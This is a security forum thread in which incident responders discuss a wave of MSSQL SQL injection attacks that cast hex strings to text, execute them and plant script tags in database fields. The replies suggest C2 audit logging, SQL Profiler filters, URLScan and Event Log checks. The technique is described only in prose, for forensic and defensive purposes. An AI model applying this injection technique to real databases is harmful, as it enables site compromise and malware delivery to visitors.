Hi all,
There have been a slew of SQL injection attacks since about Jan 08.
I have worked a few of them.
Attacker uses a 'cast' option to declare a variable and then exec it. the result of this attack is that a database has now been riddled with <script src=> tags.
In my experience, this attack has always left an easy to follow trail(IIS logs).
I am currently looking at an incident where there are numerous delcare/cast entries throughout the logs. The problem is, after exporting the cs-uri-query entries to a csv, removed duplicates, decoded and I have NOT found a matching entry for the script src tags that were appended to the database fields.
The only thing I can think is that there is another web app somewhere using this db. Of course no documentation at all.
Anyway, to my question, what can i do on an MSSQL server to log activity to a particular database (as verbose as possible)?
Or any other advise?
Some tomes I have been following
Rise in SQL Injection Attacks Exploiting Unverified User Data Input
I recently came across a few Hex based SQL Injection attacks, most of them being automated (bots). Unfortunately there are still a lot of easy targets for these attacks; even Firefox plugins such as
If you look at the weekly download statistics for these plugins .
… roll
Hi all,
Anyway, to my question, what can i do on an MSSQL server to log activity to a particular database (as verbose as possible)?
Or any other advise?
The first thing you might want to look for is any Event Log entries related to that activity. While it won't log the computer they came from, they will give you some external data on the activity itself.
Now, to answer your question, there is a type of SQL logging available called "C2 logging." C2 is a government security rating that certifies a system has secured its resources and has sufficient auditing capabilities. It is turned on by the DBA using the SQL command line tool, osql.exe. Once C2 is enabled, all types of database access are logged into a trace file. In my experience, though you may or may not find anything in these logs, depending on the nature of the exploit. I know for a fact that many Metasploit SQL exploits will leave no trace in these or any other logs.
I'm not a DBA, so you may want to see if you can find one locally to help you if you want to set up C2 logging. However, I do have the commands needed so you can PM me if you need additional information.
Mark
Mark,
The first thing you might want to look for is any Event Log entries related to that activity. While it won't log the computer they came from, they will give you some external data on the activity itself.
What are the event IDs and sources that one should look for, and in which Event Log?
Hi all,
There have been a slew of SQL injection attacks since about Jan 08.
I have worked a few of them.
Attacker uses a 'cast' option to declare a variable and then exec it. the result of this attack is that a database has now been riddled with <script src=> tags.
In my experience, this attack has always left an easy to follow trail(IIS logs).
I am currently looking at an incident where there are numerous delcare/cast entries throughout the logs. The problem is, after exporting the cs-uri-query entries to a csv, removed duplicates, decoded and I have NOT found a matching entry for the script src tags that were appended to the database fields.
The only thing I can think is that there is another web app somewhere using this db. Of course no documentation at all.
Anyway, to my question, what can i do on an MSSQL server to log activity to a particular database (as verbose as possible)?
Or any other advise?
Run SQL profiler and filter the text data for any statements that have CAST or CONVERT. Might also look at a quick and dirty application firewall that will filter this stuff to start with (microsoft released an update to URLScan that will do this). It's really clever how some of these have been working. They pass a binary string to SQL Server, cast it back to character text and then EXEC it. ON the bright side, most have been pretty benign–at least you can easily remove their script as opposed to them changing data beyond repair (restore).
Mark,
What are the event IDs and sources that one should look for, and in which Event Log?
Whether or not you have any Event log entries is dependent upon the audit level set in the SQL Server properties. These events will be generated in the Windows Application Event Log. Default logging of normal user logins is not enabled, but failed and successful logins for the SQL Admin account is. You can set logging for all failed and successful logins in the settings for the SQL Server.
The information I have in front of me is that the Event ID for SQL logins is 17055. However, you might want to filter on all events with a Source of MSSQLSERVER. As I said earlier, this will not tell you where the connection came from, but it could help isolate the activity's date and time when looking through other logs like firewall or IIS logs. Those logs might then identify your source or give you a place to start looking.
Mark
Mark,
What are the event IDs and sources that one should look for, and in which Event Log?
Whether or not you have any Event log entries is dependent upon the audit level set in the SQL Server properties. These events will be generated in the Windows Application Event Log. Default logging of normal user logins is not enabled, but failed and successful logins for the SQL Admin account is. You can set logging for all failed and successful logins in the settings for the SQL Server.
The information I have in front of me is that the Event ID for SQL logins is 17055. However, you might want to filter on all events with a Source of MSSQLSERVER. As I said earlier, this will not tell you where the connection came from, but it could help isolate the activity's date and time when looking through other logs like firewall or IIS logs. Those logs might then identify your source or give you a place to start looking.
Mark
Right, but if it's a web application, failed logins aren't going to do you a lot of good (unless you have your SQL Server open to the world and someone is actually hitting that directly).
